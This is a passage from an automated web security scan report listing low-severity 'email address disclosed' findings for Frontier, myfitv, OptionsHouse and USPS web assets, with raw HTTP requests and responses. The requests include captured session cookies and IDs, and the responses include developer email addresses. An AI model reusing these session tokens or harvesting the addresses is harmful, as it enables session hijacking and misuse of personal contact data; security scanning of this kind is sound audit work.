Response

HTTP/1.1 200 OK
Content-Length: 32426
Content-Type: application/x-javascript
Content-Location: http://www.frontierhelp.com/func.js
Last-Modified: Wed, 01 Apr 2009 16:22:44 GMT
Accept-Ranges: bytes
ETag: "0221d16e6b2c91:b9b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:41 GMT

var newWindow;
var weekend = [0,6];
var weekendColor = "#e0e0e0";
var fontface = "Verdana";
var fontsize = 2;

var gNow = new Date();
var ggWinCal;
isNav = (navigator.appName.indexOf("Netscape
...[SNIP]...
< 3) || !isEmailAddr(formField.value)) )
   {
       alert("Please enter a complete email address in the form: yourname@yourdomain.com");
       formField.focus();
       result = false;
   }

return result;

}

function validNum(formField,fieldLabel,required)
{
   var result = true;

   if (required && !validRequired(formField,fie
...[SNIP]...

18.28. https://www.frontiermobile.com/data/Js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /data/Js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /data/Js/s_code.js HTTP/1.1
Host: www.frontiermobile.com
Connection: keep-alive
Referer: https://www.frontiermobile.com/data/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da933aCMYKM; ASPSESSIONIDSATQTBDS=GGODMNPCPECFKPDLNFBJFLCO; ASP.NET_SessionId=bcv1oo45gbysf4jskjggz355

Response

HTTP/1.1 200 OK
Content-Length: 19002
Content-Type: application/x-javascript
Last-Modified: Sun, 23 May 2010 04:44:16 GMT
Accept-Ranges: bytes
ETag: "7c59a19932faca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:51:12 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//DEV
//var s_account
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

18.29. http://www.frontierpages.com/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /scripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas

Response

HTTP/1.1 200 OK
Content-Length: 17665
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Mar 2010 15:00:18 GMT
Accept-Ranges: bytes
ETag: "0ed9e84fb9ca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:47 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

//Dev
//var s_account="cznquapages"

//Prod
var s_account="cznpages"
...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

18.30. http://www.myfitv.com/javascripts/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /javascripts/all.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/all.js?1314990512 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 06 Sep 2011 12:45:30 GMT
ETag: "64fd2-551ae-4abfa1659cc00"-gzip
Last-Modified: Fri, 02 Sep 2011 19:08:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 348590

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.31. http://www.myfitv.com/javascripts/jquery.hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /javascripts/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/jquery.hoverIntent.js HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/portal/recent_tv_elastic
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 06 Sep 2011 12:29:50 GMT
ETag: "2a3f8-11aa-4abfa1659cc00"-gzip
Last-Modified: Fri, 02 Sep 2011 19:08:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 4522
Connection: keep-alive

.../**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
<a href="mailto:customerservice@optionshouse.com">customerservice@optionshouse.com</a>
...[SNIP]...

18.33. https://www.optionshouse.com/tool/2011.09.01.19.07/asset/coreuiConcatMin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/asset/coreuiConcatMin.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tool/2011.09.01.19.07/asset/coreuiConcatMin.js HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:03 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Vary: Accept-Encoding
Accept-Ranges: bytes
Last-Modified: Fri, 02 Sep 2011 00:23:32 GMT
Content-Length: 610876

var Base=function(){};
Base.extend=function(_instance,_static){var extend=Base.prototype.extend;
Base._prototyping=true;
var proto=new this;
extend.call(proto,_instance);
delete Base._prototyping;
var
...[SNIP]...
s("selectedLink")
},handleSelectBoxChange:function(){var smsProviderValue=oh.utils.forms.getValue(this.$smsProviderSelectBox);
if(smsProviderValue=="other"){this.$deliverySMSExampleText.html("Example: 8885551212@otherprovider.com <br/>
...[SNIP]...
oh.utils.validators.email.runTest(smsNumber);
if(!validPhoneNumber||!validSMSFullAddress){isValid=false;
errorOnNumberFieldOnly=true;
this.addErrorPageLevelMessage("Please enter a number in the format 8885551212@otherprovider.com")
}}else{validPhoneNumber=(oh.utils.validators.phone.runTest(smsNumber)&&smsNumber.length==10);
if(!validPhoneNumber){isValid=false;
errorOnNumberFieldOnly=true;
this.addErrorPageLevelMessage("Please
...[SNIP]...

18.34. https://www.usps.com/ContentTemplates/assets/css/components.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/assets/css/components.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/assets/css/components.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "4fe84d33-1-0-b7e9"
Last-Modified: Wed, 29 Jun 2011 15:30:59 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 47081
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        components.css
       @author            david.milton@akqa.com
       @description    Page layout + global style definitions for the content page individual components
       
       Contents
       0. General layout rules
       1. Navigation
           1a. Sub-nav Menu
           1b. Get-help Menu
...[SNIP]...

18.35. https://www.usps.com/ContentTemplates/assets/css/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/assets/css/home.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/assets/css/home.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "bdc749f6-3-0-37c8"
Last-Modified: Fri, 22 Jul 2011 21:00:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 14280
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        home.css
       @author            aziz.syed@akqa.com
       @description    Style definitions for the homepage

changes:
       
       Contents
       1. Carousel
       2. Promo spots
       3. Background
       4. Quick Tools
       5. Print a Label Widget
       6. Misc
...[SNIP]...

18.36. https://www.usps.com/ContentTemplates/assets/css/templates.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/assets/css/templates.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/assets/css/templates.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "8626a49c-1-0-178d"
Last-Modified: Mon, 07 Feb 2011 14:36:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 6029
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        templates.css
       @author            david.milton@akqa.com
       @description    Page layout + global style definitions for the content page templates
       
       Contents
       1. Page Layout
       2. Generic Styles
       3. Navigation Pane (navigation side bar)
       4. Component
...[SNIP]...

18.37. https://www.usps.com/ContentTemplates/common/css/fonts.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/fonts.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/fonts.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "6c32b0cd-3-0-ac2"
Last-Modified: Tue, 09 Nov 2010 17:06:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2754
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:16 GMT
Connection: keep-alive

/*    -----------------------------------------------------------------------------------
       @filename        fonts.jsp (content type = "text/css")
       @author            aziz.syed@akqa.com
       @description    Style definitions for the global type styles &amp; colors
   ----------------------------------------------------------------------------------- */
.fontStyle1,
h1{
   font-size:3.0em;
...[SNIP]...

18.38. https://www.usps.com/ContentTemplates/common/css/globals/button-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/button-styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/button-styles.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "b8ddc8e3-1-0-2833"
Last-Modified: Wed, 25 May 2011 11:13:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 10291
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:17 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        button-styles.css
       @author            aziz.syed@akqa.com
       @description    buttonss global style definitions
       
       Content
       1. Buttons
/*
   =========== 1 Buttons ===========
*/
/*
* Large text box
*/
div.input-text-lg span {
   height:27px;
}
div.
...[SNIP]...

18.39. https://www.usps.com/ContentTemplates/common/css/globals/links.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/links.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/links.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "90b8f797-1-0-6a5"
Last-Modified: Tue, 09 Nov 2010 17:07:52 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1701
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:17 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        links.css
       @author            aziz.syed@akqa.com
       @description    links global style definitions
       
       Content
       1. Links
/*
   =========== 1 Links ===========
*/
a{
   color:#2f6fa9;
   text-decoration:underline;
}

a.primary,
a.standard,
a.t
...[SNIP]...

18.40. https://www.usps.com/ContentTemplates/common/css/globals/modals.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/modals.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/modals.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "1ee39bf6-1-0-14ce"
Last-Modified: Tue, 09 Nov 2010 17:07:52 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5326
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:18 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        modals.css
       @author            aziz.syed@akqa.com
       @description    global modals style definitions
       
       Content
       1. Modals
       2. Product Added Modals
/*
   =========== 8. Modal ===========
*/

div.force-modal-close{
   display:none;
}
#modals{
...[SNIP]...

18.41. https://www.usps.com/ContentTemplates/common/css/globals/qt-modals.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/qt-modals.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/qt-modals.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "d9a7b5e8-2-0-3edb"
Last-Modified: Tue, 23 Aug 2011 14:36:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 16091
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:18 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        qt-modals.css
       @author            aziz.syed@akqa.com
       @description    quick tools modals style definitions
       
       Content
       1. Quick Tools Modals
       2. PO Locator Modal
       3. Caclulate Price Modal
/*
   =========== 1. Quick Tools Modals ===========
*/
...[SNIP]...

18.42. https://www.usps.com/ContentTemplates/common/css/globals/text-fields.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/text-fields.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/text-fields.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "235e925f-1-0-71a"
Last-Modified: Tue, 09 Nov 2010 17:07:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1818
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:17 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        text-fields.css
       @author            aziz.syed@akqa.com
       @description    text fields global style definitions
       
       Content
       1. Text fields
/*    
   =========== 1. Text fields ===========
*/
/*
* Styled text fields. Container must have the class "input
...[SNIP]...

18.43. https://www.usps.com/ContentTemplates/common/css/globals/tooltips.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/tooltips.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/tooltips.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "e5e754b4-1-0-831"
Last-Modified: Tue, 09 Nov 2010 17:07:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2097
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:18 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        tooltips.css
       @author            aziz.syed@akqa.com
       @description    global tooltips style definitions
       
       Content
       1. Tool Tips
/*
   =========== 1. Tool Tips ===========
*/

.toolIcon{
   background:transparent url(/ContentTemplates/common/imag
...[SNIP]...

18.44. https://www.usps.com/ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "38c46ae7-1-0-24a1"
Last-Modified: Tue, 09 Nov 2010 17:09:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9377
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:14 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        modal_fluid.css
       @author            trey.eckels@akqa.com
       @description    Style definitions for the verticaly fluid modal
       
       Contents
       1. Lightbox Background
       2. Modal Outlines
       3. Close Modal Button
       4. Modal Endcaps and borders
       5. Common Ele
...[SNIP]...

18.45. https://www.usps.com/ContentTemplates/common/css/usps-print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/usps-print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/usps-print.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uspsstaticwebpop=1; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315327999740:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "98468ee8-1-0-d95"
Last-Modified: Tue, 09 Nov 2010 17:06:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3477
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:34 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        usps_print.css
